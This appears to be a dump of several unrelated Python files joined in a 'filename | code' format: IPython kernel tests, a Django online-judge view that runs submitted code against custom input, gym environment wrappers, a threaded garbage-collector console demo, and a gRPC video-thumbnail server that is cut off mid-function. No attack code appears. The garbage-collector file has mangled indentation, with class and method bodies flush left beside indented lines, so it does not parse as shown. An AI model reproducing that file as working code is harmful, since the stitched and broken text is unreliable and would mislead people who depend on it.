        sys.stderr.write(err)  # surface kernel-side errors on failure
        assert '' in ast.literal_eval(out.strip())
def test_sys_path_profile_dir():
    """sys.path should still contain '' when `--profile-dir` is specified."""
    with new_kernel(['--profile-dir', locate_profile('default')]) as kc:
        execute(kc=kc, code="import sys; print(repr(sys.path))")
        out, err = assemble_output(kc.iopub_channel)
        sys.stderr.write(err)  # surface kernel-side errors on failure
        assert '' in ast.literal_eval(out.strip())
@flaky(max_runs=3)
@dec.skipif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_print():
    """Output printed from forked mp.Process children is captured."""
    with new_kernel() as kc:
        iopub = kc.iopub_channel
        _check_master(kc, expected=True)
        flush_channels(kc)
        n_children = 5
        code = '\n'.join([
            "from __future__ import print_function",
            "import time",
            "import multiprocessing as mp",
            "pool = [mp.Process(target=print, args=('hello', i,)) for i in range(%i)]" % n_children,
            "for p in pool: p.start()",
            "for p in pool: p.join()",
            "time.sleep(0.5),"
        ])
        execute(kc=kc, code=code)
        stdout, stderr = assemble_output(iopub)
        nt.assert_equal(stdout.count("hello"), n_children, stdout)
        for i in range(n_children):
            nt.assert_equal(stdout.count(str(i)), 1, stdout)
        assert stderr == ''
        _check_master(kc, expected=True)
        _check_master(kc, expected=True, stream="stderr")
@flaky(max_runs=3)
def test_subprocess_noprint():
    """mp.Process children that never print don't trigger iostream mp_mode."""
    with kernel() as kc:
        n_children = 5
        code = '\n'.join([
            "import multiprocessing as mp",
            "pool = [mp.Process(target=range, args=(i,)) for i in range(%i)]" % n_children,
            "for p in pool: p.start()",
            "for p in pool: p.join()"
        ])
        execute(kc=kc, code=code)
        out, err = assemble_output(kc.iopub_channel)
        assert out == ''
        assert err == ''
        _check_master(kc, expected=True)
        _check_master(kc, expected=True, stream="stderr")
@flaky(max_runs=3)
@dec.skipif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_error():
    """An exception inside an mp.Process must not crash the kernel."""
    with new_kernel() as kc:
        code = '\n'.join([
            "import multiprocessing as mp",
            "p = mp.Process(target=int, args=('hi',))",
            "p.start()",
            "p.join()",
        ])
        execute(kc=kc, code=code)
        out, err = assemble_output(kc.iopub_channel)
        assert out == ''
        assert "ValueError" in err
        _check_master(kc, expected=True)
        _check_master(kc, expected=True, stream="stderr")
# raw_input tests
def test_raw_input():
    """The kernel forwards [raw_]input prompts and echoes replies."""
    with kernel() as kc:
        input_f = "input" if py3compat.PY3 else "raw_input"
        theprompt = "prompt> "
        code = 'print({input_f}("{theprompt}"))'.format(
            input_f=input_f, theprompt=theprompt)
        kc.execute(code, allow_stdin=True)
        msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
        assert msg['header']['msg_type'] == u'input_request'
        assert msg['content']['prompt'] == theprompt
        text = "some text"
        kc.input(text)
        reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
        assert reply['content']['status'] == 'ok'
        stdout, _ = assemble_output(kc.iopub_channel)
        assert stdout == text + "\n"
@dec.skipif(py3compat.PY3)
def test_eval_input():
    """On Python 2, input() evaluates the reply as an expression."""
    with kernel() as kc:
        theprompt = "prompt> "
        code = 'print(input("{theprompt}"))'.format(theprompt=theprompt)
        kc.execute(code, allow_stdin=True)
        msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
        assert msg['header']['msg_type'] == u'input_request'
        assert msg['content']['prompt'] == theprompt
        kc.input("1+1")
        reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
        assert reply['content']['status'] == 'ok'
        stdout, _ = assemble_output(kc.iopub_channel)
        assert stdout == "2\n"
def test_save_history():
    """%hist -f used to fail on unicode history entries (Python 2)."""
    with kernel() as kc, TemporaryDirectory() as td:
        hist_file = os.path.join(td, 'hist.out')
        for cell in (u'a=1', u'b=u"abcþ"'):
            execute(cell, kc=kc)
            wait_for_idle(kc)
        _, reply = execute("%hist -f " + hist_file, kc=kc)
        assert reply['status'] == 'ok'
        with io.open(hist_file, encoding='utf-8') as f:
            saved = f.read()
        assert u'a=1' in saved
        assert u'b=u"abcþ"' in saved
@dec.skip_without('faulthandler')
def test_smoke_faulthandler():
    """Enabling faulthandler inside the kernel must not error."""
    with kernel() as kc:
        # Note: faulthandler.register is not available on windows.
        code = u'\n'.join([
            'import sys',
            'import faulthandler',
            'import signal',
            'faulthandler.enable()',
            'if not sys.platform.startswith("win32"):',
            ' faulthandler.register(signal.SIGTERM)'])
        _, reply = execute(code, kc=kc)
        nt.assert_equal(reply['status'], 'ok', reply.get('traceback', ''))
def test_help_output():
    """ipython kernel --help-all works"""
    # Delegates to the shared traitlets help-output smoke test.
    tt.help_all_output_test('kernel')
def test_is_complete():
    """The kernel exposes the is_complete interface correctly."""
    with kernel() as kc:
        # There are more test cases for this in core - here we just check
        # that the kernel exposes the interface correctly.
        def reply_content():
            return kc.get_shell_msg(block=True, timeout=TIMEOUT)['content']

        kc.is_complete('2+2')
        assert reply_content()['status'] == 'complete'
        # SyntaxError
        kc.is_complete('raise = 2')
        assert reply_content()['status'] == 'invalid'
        kc.is_complete('a = [1,\n2,')
        content = reply_content()
        assert content['status'] == 'incomplete'
        assert content['indent'] == ''
        # Cell magic ends on two blank lines for console UIs
        kc.is_complete('%%timeit\na\n\n')
        assert reply_content()['status'] == 'complete'
def test_complete():
    """Completion on `a.` returns matches that extend the cell."""
    with kernel() as kc:
        execute(u'a = 1', kc=kc)
        wait_for_idle(kc)
        cell = 'import IPython\nb = a.'
        kc.complete(cell)
        reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
        c = reply['content']
        assert c['status'] == 'ok'
        # Fix: compute the cursor position once; previously `start` was
        # assigned but the assertion recomputed cell.find('a.') + 2.
        end = cell.find('a.') + 2
        assert c['cursor_end'] == end
        assert c['cursor_start'] <= end
        # there are many right answers for cursor_start,
        # so verify application of the completion
        # rather than the value of cursor_start
        matches = c['matches']
        assert matches
        for m in matches:
            completed = cell[:c['cursor_start']] + m
            assert completed.startswith(cell)
@dec.skip_without('matplotlib')
def test_matplotlib_inline_on_import():
    """Importing pyplot in the kernel selects the inline backend."""
    with kernel() as kc:
        cell = '\n'.join([
            'import matplotlib, matplotlib.pyplot as plt',
            'backend = matplotlib.get_backend()'
        ])
        _, reply = execute(cell, user_expressions={'backend': 'backend'},
                           kc=kc)
        _check_status(reply)
        backend_bundle = reply['user_expressions']['backend']
        _check_status(backend_bundle)
        assert 'backend_inline' in backend_bundle['data']['text/plain']
def test_message_order():
    """Replies arrive in submission order with sequential execution counts."""
    N = 100  # number of messages to test
    with kernel() as kc:
        _, reply = execute("a = 1", kc=kc)
        _check_status(reply)
        offset = reply['execution_count'] + 1
        cell = "a += 1\na"
        # submit N executions as fast as we can
        msg_ids = [kc.execute(cell) for _ in range(N)]
        # check message-handling order
        for expected_count, msg_id in enumerate(msg_ids, offset):
            reply = kc.get_shell_msg(timeout=TIMEOUT)
            _check_status(reply['content'])
            assert reply['content']['execution_count'] == expected_count
            assert reply['parent_header']['msg_id'] == msg_id
def test_shutdown():
    """Kernel exits after polite shutdown_request"""
    with new_kernel() as kc:
        km = kc.parent
        execute(u'a = 1', kc=kc)
        wait_for_idle(kc)
        kc.shutdown()
        # Poll up to 300 times at 0.1s intervals -> 30s timeout.
        for _ in range(300):
            if not km.is_alive():
                break
            time.sleep(.1)
        assert not km.is_alive()
|
views.py | from .models import Problem, TestCase
from . import forms as problems_forms
from django.http import Http404
from django.shortcuts import render, redirect
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.template.context_processors import csrf
from django.contrib.auth.models import User
from judge.models import *
from judge.models import last_queue
from judge.oldcheck import bashoutput
from django.core.files.base import ContentFile
import threading
from datetime import datetime
from django.utils import timezone
from django.utils.six.moves.urllib.parse import urlencode
# Create your views here.
# NOTE(review): captured once at import time, so ``now`` goes stale in a
# long-running server process; views should prefer a per-request timestamp.
now = datetime.now()
def index(request):
    """
    Display the list of all :model:`problems.Problem` objects whose contest
    has already started, so the user can reach every visible problem from a
    single page.

    **Context:**

    ``all_problems``
        Queryset of :model:`problems.Problem` visible at the current time.

    **Template:**

    :template:`problems/index.html`
    """
    visible_problems = Problem.objects.filter(
        contest__start_time__lte=timezone.now())
    return render(request, "problems/index.html",
                  {'all_problems': visible_problems})
def problem(request, problemID):
    """
    Detailed view for a single :model:`problems.Problem`.

    Behaviour depends on the contest the problem belongs to:

    - Problems of future contests raise Http404.
    - For past contests the user may submit a solution (file upload or the
      inbuilt ace editor, which supports syntax highlighting for multiple
      languages) and may run code against custom input for a quick check.
    - For running contests the page is rendered for registered users with a
      countdown timer.

    **Context:**

    ``submit_form`` / ``code_form`` / ``test_form``
        Django form instances for the three submission paths.
    ``problem`` / ``contest``
        The :model:`problems.Problem` and its contest.
    ``text_on_ace`` / ``lang_for_ace``
        Default contents and language of the ace editor.
    ``output`` / ``hide_or_not``
        Custom-input verdict and whether the output card is shown.

    **Template:**

    1. :template:`problems/problem.html` (past contests)
    2. :template:`problems/isactive.html` (running contests)
    """
    # Fix: compute the request time locally. The module-level ``now`` is
    # frozen at import time, which made the contest start/end comparisons
    # below stale (the GET branch already used a fresh timestamp).
    now = datetime.now()
    try:
        problem = Problem.objects.get(problem_ID=problemID)
    except Problem.DoesNotExist:
        raise Http404("There is no such problem. Please check again")
    if request.method == 'POST':
        submit_form = problems_forms.SubmitForm(request.POST, request.FILES)
        code_form = problems_forms.CodeForm(request.POST)
        test_form = problems_forms.TestForm(request.POST)
        if submit_form.is_valid():
            # File-upload submission: round-robin over the three grader queues.
            global last_queue
            last_queue = (last_queue + 1) % 3
            submission = submit_form.save(commit=False)
            submission.user = User.objects.get(username=request.user)
            submission.problem = problem
            submission.queue = Queue.objects.all()[last_queue]
            submission.save()
            messages.success(request, 'Successfully Submitted')
            if not grader_running[last_queue]:
                t = threading.Thread(target=grader, kwargs={'queue_number': last_queue})
                t.start()
            return redirect(reverse('mysubmissions', kwargs={'username': request.user}))
        elif code_form.is_valid():
            # Submission typed into the inbuilt ace editor.
            def process():
                global last_queue
                last_queue = (last_queue + 1) % 3
                data = code_form.cleaned_data
                submission = Submission()
                submission.language = data['lang']
                submission.user = User.objects.get(username=request.user)
                submission.problem = problem
                submission.queue = Queue.objects.all()[last_queue]
                submission.uploaded_file.save('arbit', ContentFile(data['code']))
                submission.save()
            process()
            messages.success(request, 'Successfully Submitted')
            if not grader_running[last_queue]:
                t = threading.Thread(target=grader, kwargs={'queue_number': last_queue})
                t.start()
            return redirect(reverse('mysubmissions', kwargs={'username': request.user}))
        elif test_form.is_valid():
            # "Run against custom input": write the code and input into the
            # user's upload area, run it out-of-band, and show the output.
            data = test_form.cleaned_data
            test_lang = data['test_lang']
            test_code = data['test_code']
            test_input = data['test_input']
            username_of_user = request.user.username
            f = open("uploads/users/%s/test.%s" % (username_of_user, test_lang), "w+")
            f.write(test_code)
            f.close()
            g = open("uploads/users/%s/inp" % (username_of_user), "w+")
            g.write(test_input)
            g.close()
            output = bashoutput("uploads/users/%s/test.%s" % (username_of_user, test_lang), "uploads/users/%s/inp" % (username_of_user), test_lang)
            args = {}
            args.update(csrf(request))
            args['submit_form'] = problems_forms.SubmitForm()
            args['code_form'] = problems_forms.CodeForm()
            args['test_form'] = problems_forms.TestForm()
            args['problem'] = problem
            contest = problem.contest
            args['contest'] = contest
            args['output'] = "Output :\n" + output
            args['hide_or_not'] = "visible"
            args['text_on_ace'] = test_code
            args['lang_for_ace'] = test_lang
            if contest.end_time.strftime('%Y-%m-%d %H:%M') <= now.strftime('%Y-%m-%d %H:%M'):
                return render(request, "problems/problem.html", args)
            elif contest.start_time.strftime('%Y-%m-%d %H:%M') <= now.strftime('%Y-%m-%d %H:%M'):
                registered = contest.registered_user.filter(username=request.user.username)
                args['registered'] = registered
                return render(request, "problems/isactive.html", args)
            else:
                raise Http404("There is no such problem you prick, you can't hack the system the system hacks you -_- !!")
        else:
            messages.warning(request, 'There was an error. Please check!')
    # GET request, or a POST where no form validated: render the problem page.
    args = {}
    args.update(csrf(request))
    args['submit_form'] = problems_forms.SubmitForm()
    args['code_form'] = problems_forms.CodeForm()
    args['test_form'] = problems_forms.TestForm()
    args['problem'] = problem
    contest = problem.contest
    args['contest'] = contest
    args['text_on_ace'] = ""
    args['output'] = ""
    args['lang_for_ace'] = "cpp"
    args['hide_or_not'] = "hidden"
    if contest.end_time.strftime('%Y-%m-%d %H:%M:%S') <= timezone.make_aware(datetime.now(), timezone.get_default_timezone()).astimezone(timezone.utc).strftime('%Y-%m-%d %H:%M:%S'):
        return render(request, "problems/problem.html", args)
    elif timezone.make_aware(datetime.now(), timezone.get_default_timezone()).astimezone(timezone.utc).strftime('%Y-%m-%d %H:%M:%S') >= contest.start_time.strftime('%Y-%m-%d %H:%M:%S'):
        registered = contest.registered_user.filter(username=request.user.username)
        args['registered'] = registered
        return render(request, "problems/isactive.html", args)
    else:
        raise Http404("There is no such problem you prick, you can't hack the system the system hacks you -_- !!")
|
wrappers.py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for OpenAI Gym environments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import functools
import multiprocessing
import sys
import traceback
import gym
import gym.spaces
import numpy as np
import tensorflow.compat.v1 as tf
class AttributeModifier(object):
  """Provides getter and setter functions to access wrapped environments."""

  def __getattr__(self, name):
    # Unknown attributes are looked up on the wrapped environment.
    return getattr(self._env, name)

  def set_attribute(self, name, value):
    """Set an attribute in the wrapped environment.

    Args:
      name: Attribute to access.
      value: New attribute value.
    """
    setter = getattr(self._env, 'set_attribute', None)
    if callable(setter):
      setter(name, value)
    else:
      setattr(self._env, name, value)
class RangeNormalize(AttributeModifier):
  """Normalize the specialized observation and action ranges to [-1, 1]."""

  def __init__(self, env):
    self._env = env
    self._should_normalize_observ = self._is_finite(env.observation_space)
    if not self._should_normalize_observ:
      tf.logging.info('Not normalizing infinite observation range.')
    self._should_normalize_action = self._is_finite(env.action_space)
    if not self._should_normalize_action:
      tf.logging.info('Not normalizing infinite action range.')

  @property
  def observation_space(self):
    space = self._env.observation_space
    if self._should_normalize_observ:
      ones = np.ones(space.shape)
      return gym.spaces.Box(-ones, ones, dtype=np.float32)
    return space

  @property
  def action_space(self):
    space = self._env.action_space
    if self._should_normalize_action:
      ones = np.ones(space.shape)
      return gym.spaces.Box(-ones, ones, dtype=np.float32)
    return space

  def step(self, action):
    if self._should_normalize_action:
      action = self._denormalize_action(action)
    observ, reward, done, info = self._env.step(action)
    if self._should_normalize_observ:
      observ = self._normalize_observ(observ)
    return observ, reward, done, info

  def reset(self):
    observ = self._env.reset()
    if self._should_normalize_observ:
      observ = self._normalize_observ(observ)
    return observ

  def _denormalize_action(self, action):
    # Map [-1, 1] back into the environment's native action range.
    low = self._env.action_space.low
    high = self._env.action_space.high
    return (action + 1) / 2 * (high - low) + low

  def _normalize_observ(self, observ):
    # Map the native observation range into [-1, 1].
    low = self._env.observation_space.low
    high = self._env.observation_space.high
    return 2 * (observ - low) / (high - low) - 1

  def _is_finite(self, space):
    return np.isfinite(space.low).all() and np.isfinite(space.high).all()
class ClipAction(AttributeModifier):
  """Clip out of range actions to the action space of the environment."""

  def __init__(self, env):
    self._env = env

  @property
  def action_space(self):
    # Advertise an unbounded action space; step() clips into the real one.
    shape = self._env.action_space.shape
    bound = np.inf * np.ones(shape)
    return gym.spaces.Box(-bound, bound, dtype=np.float32)

  def step(self, action):
    space = self._env.action_space
    clipped = np.clip(action, space.low, space.high)
    return self._env.step(clipped)
class LimitDuration(AttributeModifier):
  """End episodes after specified number of steps."""

  def __init__(self, env, duration):
    self._env = env
    self._duration = duration
    # None means "not inside an episode"; reset() starts the counter.
    self._step = None

  def reset(self):
    self._step = 0
    return self._env.reset()

  def step(self, action):
    if self._step is None:
      raise RuntimeError('Must reset environment.')
    observ, reward, done, info = self._env.step(action)
    self._step += 1
    if self._step >= self._duration:
      # Force episode termination and require a reset before stepping again.
      done = True
      self._step = None
    return observ, reward, done, info
class ExternalProcess(object):
  """Step environment in a separate process for lock free paralellism."""

  # Message types for communication via the pipe.
  _ACTION = 1
  _RESET = 2
  _CLOSE = 3
  _GETATTRIBUTE = 4
  _SETATTRIBUTE = 5
  _TRANSITION = 6
  _OBSERV = 7
  _EXCEPTION = 8
  _VALUE = 9

  def __init__(self, constructor):
    """Step environment in a separate process for lock free paralellism.

    The environment will be created in the external process by calling the
    specified callable. This can be an environment class, or a function
    creating the environment and potentially wrapping it. The returned
    environment should not access global variables.

    Args:
      constructor: Callable that creates and returns an OpenAI gym environment.

    Attributes:
      observation_space: The cached observation space of the environment.
      action_space: The cached action space of the environment.
    """
    self._conn, conn = multiprocessing.Pipe()
    self._process = multiprocessing.Process(
        target=self._worker, args=(constructor, conn))
    # Make sure the worker is terminated even if the main process exits
    # without calling close() explicitly.
    atexit.register(self.close)
    self._process.start()
    # Spaces are fetched lazily from the worker and cached here.
    self._observ_space = None
    self._action_space = None

  @property
  def observation_space(self):
    if not self._observ_space:
      self._observ_space = self.__getattr__('observation_space')
    return self._observ_space

  @property
  def action_space(self):
    if not self._action_space:
      self._action_space = self.__getattr__('action_space')
    return self._action_space

  def __getattr__(self, name):
    """Request an attribute from the environment.

    Note that this involves communication with the external process, so it can
    be slow.

    Args:
      name: Attribute to access.

    Returns:
      Value of the attribute.
    """
    self._conn.send((self._GETATTRIBUTE, name))
    return self._receive(self._VALUE)

  def set_attribute(self, name, value):
    """Set an attribute in the environment.

    Note that this involves communication with the external process, so it can
    be slow.

    Args:
      name: Attribute to access.
      value: New attribute value.
    """
    self._conn.send((self._SETATTRIBUTE, (name, value)))

  def step(self, action, blocking=True):
    """Step the environment.

    Args:
      action: The action to apply to the environment.
      blocking: Whether to wait for the result.

    Returns:
      Transition tuple when blocking, otherwise callable that returns the
      transition tuple.
    """
    self._conn.send((self._ACTION, action))
    if blocking:
      return self._receive(self._TRANSITION)
    else:
      return functools.partial(self._receive, self._TRANSITION)

  def reset(self, blocking=True):
    """Reset the environment.

    Args:
      blocking: Whether to wait for the result.

    Returns:
      New observation when blocking, otherwise callable that returns the new
      observation.
    """
    self._conn.send((self._RESET, None))
    if blocking:
      return self._receive(self._OBSERV)
    else:
      return functools.partial(self._receive, self._OBSERV)

  def close(self):
    """Send a close message to the external process and join it."""
    if self._process:
      try:
        self._conn.send((self._CLOSE, None))
        self._conn.close()
      except IOError:
        # The connection was already closed.
        pass
      self._process.join()
      # Python leaks file descriptors without the line below
      del self._process
      del self._conn
      # Reassign None so later close() calls take the no-op branch instead
      # of hitting __getattr__ on the deleted attributes.
      self._conn = None
      self._process = None
    else:
      pass  # Don't close a connection twice

  def _receive(self, expected_message):
    """Wait for a message from the worker process and return its payload.

    Args:
      expected_message: Type of the expected message.

    Raises:
      Exception: An exception was raised inside the worker process.
      KeyError: The reveived message is not of the expected type.

    Returns:
      Payload object of the message.
    """
    message, payload = self._conn.recv()
    # Re-raise exceptions in the main process.
    if message == self._EXCEPTION:
      stacktrace = payload
      raise Exception(stacktrace)
    if message == expected_message:
      return payload
    raise KeyError('Received message of unexpected type {}'.format(message))

  def _worker(self, constructor, conn):
    """The process waits for actions and sends back environment results.

    Args:
      constructor: Constructor for the OpenAI Gym environment.
      conn: Connection for communication to the main process.
    """
    try:
      env = constructor()
      while True:
        try:
          # Only block for short times to have keyboard exceptions be raised.
          if not conn.poll(0.1):
            continue
          message, payload = conn.recv()
        except (EOFError, KeyboardInterrupt):
          break
        if message == self._ACTION:
          action = payload
          conn.send((self._TRANSITION, env.step(action)))
          continue
        if message == self._RESET:
          assert payload is None
          conn.send((self._OBSERV, env.reset()))
          continue
        if message == self._GETATTRIBUTE:
          name = payload
          conn.send((self._VALUE, getattr(env, name)))
          continue
        if message == self._SETATTRIBUTE:
          name, value = payload
          set_attr = getattr(env, 'set_attribute', None)
          if callable(set_attr):
            env.set_attribute(name, value)
          else:
            setattr(env, name, value)
          continue
        if message == self._CLOSE:
          assert payload is None
          if hasattr(env, 'close'):
            env.close()
          break
        raise KeyError('Received message of unknown type {}'.format(message))
    except Exception:  # pylint: disable=broad-except
      # Forward the stacktrace to the parent, which re-raises it in _receive.
      stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))  # pylint: disable=no-value-for-parameter
      conn.send((self._EXCEPTION, stacktrace))
      tf.logging.error('Error in environment process: {}'.format(stacktrace))
    conn.close()
|
garbage-collector.py | #!/usr/bin/env python3.6
#
# Multi-Threaded Garbage Collection Example by NOP-Gate/StackCanary
#
from random import randint
from datetime import datetime as dt
from time import sleep
from uuid import uuid4
from cmd import Cmd
from threading import Thread, Lock
COLLECTOR_PERIOD = 30  # Seconds between garbage collector sweeps
LOG_NAME = 'garbage-collector.log'
# Shared state: the data pool, the lock serializing access to it, the lock
# the collector thread sleeps on, and the flag asking it to stop.
pool = {}
pool_lock = Lock()
sleep_lock = Lock()
stop_collecting = False
# Open the log file (overwritten on every run).
log = open(LOG_NAME, 'w')
log.write('\nThreaded Garbage Collector Example Started')
print(F'Opened log file "{LOG_NAME}" - tail it for garbage collector thread output (tail -f {LOG_NAME})')
class GarbageConsole(Cmd):
intro = F'Multi-Threaded Garbage Collection Example\n\n{Cmd.do_help.__code__.co_consts[0]}'
prompt = '> '
collector = None
reactive_collection = False # Reactive collection is activated upon addition of new data
def default(self, line):
print(F'Error: "{line}" is not a valid command')
    def emptyline(self):
        # Override Cmd's default of repeating the last command on empty input.
        pass
def do_collector(self, action):
"""collector start|stop|enable|disable
Start/stop periodic garbage collector thread or enable/disable reactive garbage collection.
Reactive collection is activated upon addition of new data.
"""
action = action.lower()
if action == 'start':
if self.collector is not None:
print('Collector is already running')
return
try:
log_message(F'Starting garbage collector with {COLLECTOR_PERIOD}s period...', True)
self.collector = Thread(target=garbage_collector)
self.collector.start()
except Exception as ex:
print(F'Error: {str(ex)}')
elif action == 'stop':
if self.collector is None:
print('Collector is not running')
return
log_message('Stopping garbage collector...', True)
global stop_collecting
stop_collecting = True
sleep_lock.release()
elif action == 'enable':
self.reactive_collection = True
log_message('Reactive garbage collection enabled', True)
elif action == 'disable':
self.reactive_collection = False
log_message('Reactive garbage collection disabled', True)
elif action == '':
print('Error: an action is required (one of: start/stop/enable/disable)')
else:
print(F'Error: "{action}" is not a valid collector action (valid actions: start/stop/enable/disable)')
def do_pool(self, _):
"""pool - print data pool contents"""
print('Data:')
pool_lock.acquire()
for id in pool:
print(F' {id} - {pool[id]} (age: {(dt.now() - pool[id]["created"]).total_seconds()}s)')
pool_lock.release()
def do_delete(self, id):
"""delete id - delete data from the pool"""
if id == '':
print('Error: you must specify the id of the data to be deleted')
return
elif id not in pool:
print(F'Error: no data with id "{id}" found in the pool')
return
pool_lock.acquire()
del pool[id]
pool_lock.release()
log_message(F'Deleted data "{id}"', True)
def do_garbage(self, lifetime):
"""garbage [lifetime] - Adds random garbage data with optional lifetime (defaults to random in [1, 240] seconds)"""
if lifetime == '':
lifetime = randint(1, 241)
pool_lock.acquire()
id = uuid4().hex
pool[id] = {
'data': None, # Data would go here, obviously
'created': dt.now(), # Consider using most recent access time instead
'lifetime': int(lifetime)
}
log_message(F'Added garbage data "{id}" with lifetime {lifetime}s', True)
pool_lock.release()
# Activate reactive garbage collection if enabled
if self.reactive_collection is True:
collector_thread = Thread(target=garbage_collector, args=(True,))
collector_thread.start()
def do_EOF(self, _):
"""Exit with CTRL+D"""
return self.do_exit()
def do_quit(self, _):
"""Exit"""
return self.do_exit()
def do_close(self, _):
"""Exit"""
return self.do_exit()
def do_exit(self, _=None):
"""Exit"""
# Signal collector thread to exit and release its sleep lock to wake it up
if self.collector is not None:
global stop_collecting
stop_collecting = True
sleep_lock.release()
# Close log file
log_message('Closing...')
log.close()
print()
return True
def log_message(message, also_print=False):
    """Append a timestamped line to the module log file and flush immediately.

    Args:
        message: text to log.
        also_print: when True, echo the (untimestamped) message to stdout.
    """
    log.write(F'[{dt.now()}] {message}\n')
    log.flush()  # flush so `tail -f` shows collector output promptly
    if also_print:
        print(message)
def garbage_collector(reactive=False):
    """Purge pool entries whose age exceeds their lifetime.

    Runs a single pass when reactive=True (triggered by a new insert);
    otherwise loops, sleeping COLLECTOR_PERIOD seconds between passes, until
    the global stop_collecting flag is set.
    """
    while True:
        if reactive:
            log_message('Running reactive garbage collection...')
        else:
            log_message('Running periodic garbage collection...')
        # Loop over keys indirectly or Python will scold us with exceptions
        ids = list(pool.keys())
        for id in ids:
            # Acquire lock before accessing object
            pool_lock.acquire()
            # NOTE(review): the id may have been deleted by the console between the
            # snapshot above and this lookup — a KeyError looks possible; confirm.
            object = pool[id]
            if (dt.now() - object['created']).total_seconds() > object['lifetime']:
                del pool[id]
                log_message(F'Removed expired object "{id}"')
            pool_lock.release()
        if reactive:
            # Reactive runs are one-shot; exit after a single pass.
            break
        else:
            # Use timeout with Lock.acquire(timeout) to control sleep duration
            # but still allow main thread to wake this thread up on exit
            sleep_lock.acquire(timeout=COLLECTOR_PERIOD)
            if stop_collecting:
                break
    if not reactive:
        try:
            # Main thread closes file handle before collector thread gets here
            # so we ignore its failure to print its dying message
            log_message('Garbage collector stopped')
        except ValueError:
            pass
def main():
    """Hold the collector's sleep lock, then run the interactive console.

    Holding the lock here makes the collector's timed acquire() block for the
    full period; releasing it (on exit or 'collector stop') wakes it early.
    """
    # Acquire the collector's sleep lock so we can wake it up on exit by releasing it
    sleep_lock.acquire()
    GarbageConsole().cmdloop()


if __name__ == '__main__':
    main()
|
server.py | # Python std lib
import contextlib
import multiprocessing
import os
import pickle
import random
import signal
import socket
import sys
import tempfile
import threading
from concurrent import futures
from typing import Iterable
# 3rd party libs
import cv2
import grpc
import numpy as np
from simber import Logger
# Local grpc module
sys.path.append("/usr/app/grpc_config")
import video_thumbnail_pb2
import video_thumbnail_pb2_grpc
# Module configuration: log destination and worker/payload sizing from the environment.
LOG_LEVEL: str = "INFO"
logger = Logger(__name__, log_path="/tmp/logs/server.log", level=LOG_LEVEL)
logger.update_format("{levelname} [(unknown):{lineno}]:")
# Number of gRPC worker processes; payload chunk size in bytes (defaults to ~2 GB).
NUM_WORKERS = int(os.environ.get("NUM_WORKERS", 1))
MAX_GRPC_PAYLOAD_SIZE = int(os.environ.get("MAX_GRPC_PAYLOAD_SIZE", 2000000000))
def get_video_thumbnail(video_path: str) -> np.ndarray:
    """Pick one random frame of the video to serve as its thumbnail.

    Args:
        video_path (str): Video to get the thumbnail from
    Returns:
        (np.ndarray): Video thumbnail, or None when the file has no readable
        frames (empty/corrupt video) or the chosen frame cannot be decoded.
    """
    cap = cv2.VideoCapture(video_path)
    thumbnail = None
    try:
        nb_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
        if nb_frames <= 0:
            # BUG FIX: randint(0, -1) raised ValueError for empty/corrupt videos.
            return None
        thumbnail_frame = random.randint(0, nb_frames - 1)  # choosing thumbnail randomly
        frame_count = 0
        while True:
            ret, frame = cap.read()
            if not ret:
                # Ran out of frames (the frame-count metadata can overestimate).
                break
            if frame_count == thumbnail_frame:
                thumbnail = frame
                break
            frame_count += 1
    finally:
        # BUG FIX: release the capture on every path, including exceptions.
        # (cv2.destroyAllWindows() removed: this headless server opens no windows.)
        cap.release()
    return thumbnail
def perform_binary_slicing(data: bytes, chunk_size: int) -> Iterable[bytes]:
    """Slice a binary blob into consecutive chunks of at most chunk_size bytes.

    Args:
        data: the blob to slice.
        chunk_size: maximum size of each emitted chunk, in bytes.
    Yields:
        Chunks whose concatenation equals `data`; an empty blob yields a
        single empty chunk so the stream is never silent.

    BUG FIX: the original measured sys.getsizeof(data) (object overhead, not
    payload length) and, when the blob was smaller than chunk_size, yielded it
    once and then fell through into the loop, yielding it a second time.
    """
    data_size = len(data)
    if data_size == 0:
        yield data
        return
    for offset in range(0, data_size, chunk_size):
        yield data[offset:offset + chunk_size]
def perform_binary_slicing_payloads(
    data: bytes, chunk_size: int
) -> Iterable[video_thumbnail_pb2.VideoResult]:
    """Wrap each binary slice of `data` in the VideoResult message the client expects."""
    payloads = (
        video_thumbnail_pb2.VideoResult(error=False, chunk=piece)
        for piece in perform_binary_slicing(data, chunk_size)
    )
    yield from payloads
class VideoService(video_thumbnail_pb2_grpc.VideoServicer):
    """gRPC servicer: receives a video as a chunk stream, replies with a pickled thumbnail."""

    def __init__(self, worker_id) -> None:
        super().__init__()
        self.worker_id = worker_id  # only used to label log lines

    def Process(
        self, request_chunks: Iterable[video_thumbnail_pb2.VideoCandidate], context
    ) -> Iterable[video_thumbnail_pb2.VideoResult]:
        """Reassemble the streamed video, thumbnail it, and stream the result back.

        On any failure a single VideoResult with error=True is yielded instead.
        """
        logger.info(f"[Worker {self.worker_id}] Processing incoming request...")
        # Processing incoming video chunks to form original video
        video_bytearray: bytearray = bytearray()
        try:
            for request_chunk in request_chunks:
                video_bytearray.extend(request_chunk.chunk)
            # Spill the reassembled bytes to a temp .mp4 so cv2 can open it by path.
            with tempfile.NamedTemporaryFile("wb", suffix=".mp4") as input_video_file:
                input_video_file.write(bytes(video_bytearray))
                # NOTE(review): no explicit flush before reading by name — the write
                # may still be buffered when cv2 opens the file; confirm.
                video_thumbnail = get_video_thumbnail(input_video_file.name)
            logger.info(f"[Worker {self.worker_id}] Finished thumbnailing.")
            thumbnail_binary = pickle.dumps(video_thumbnail)
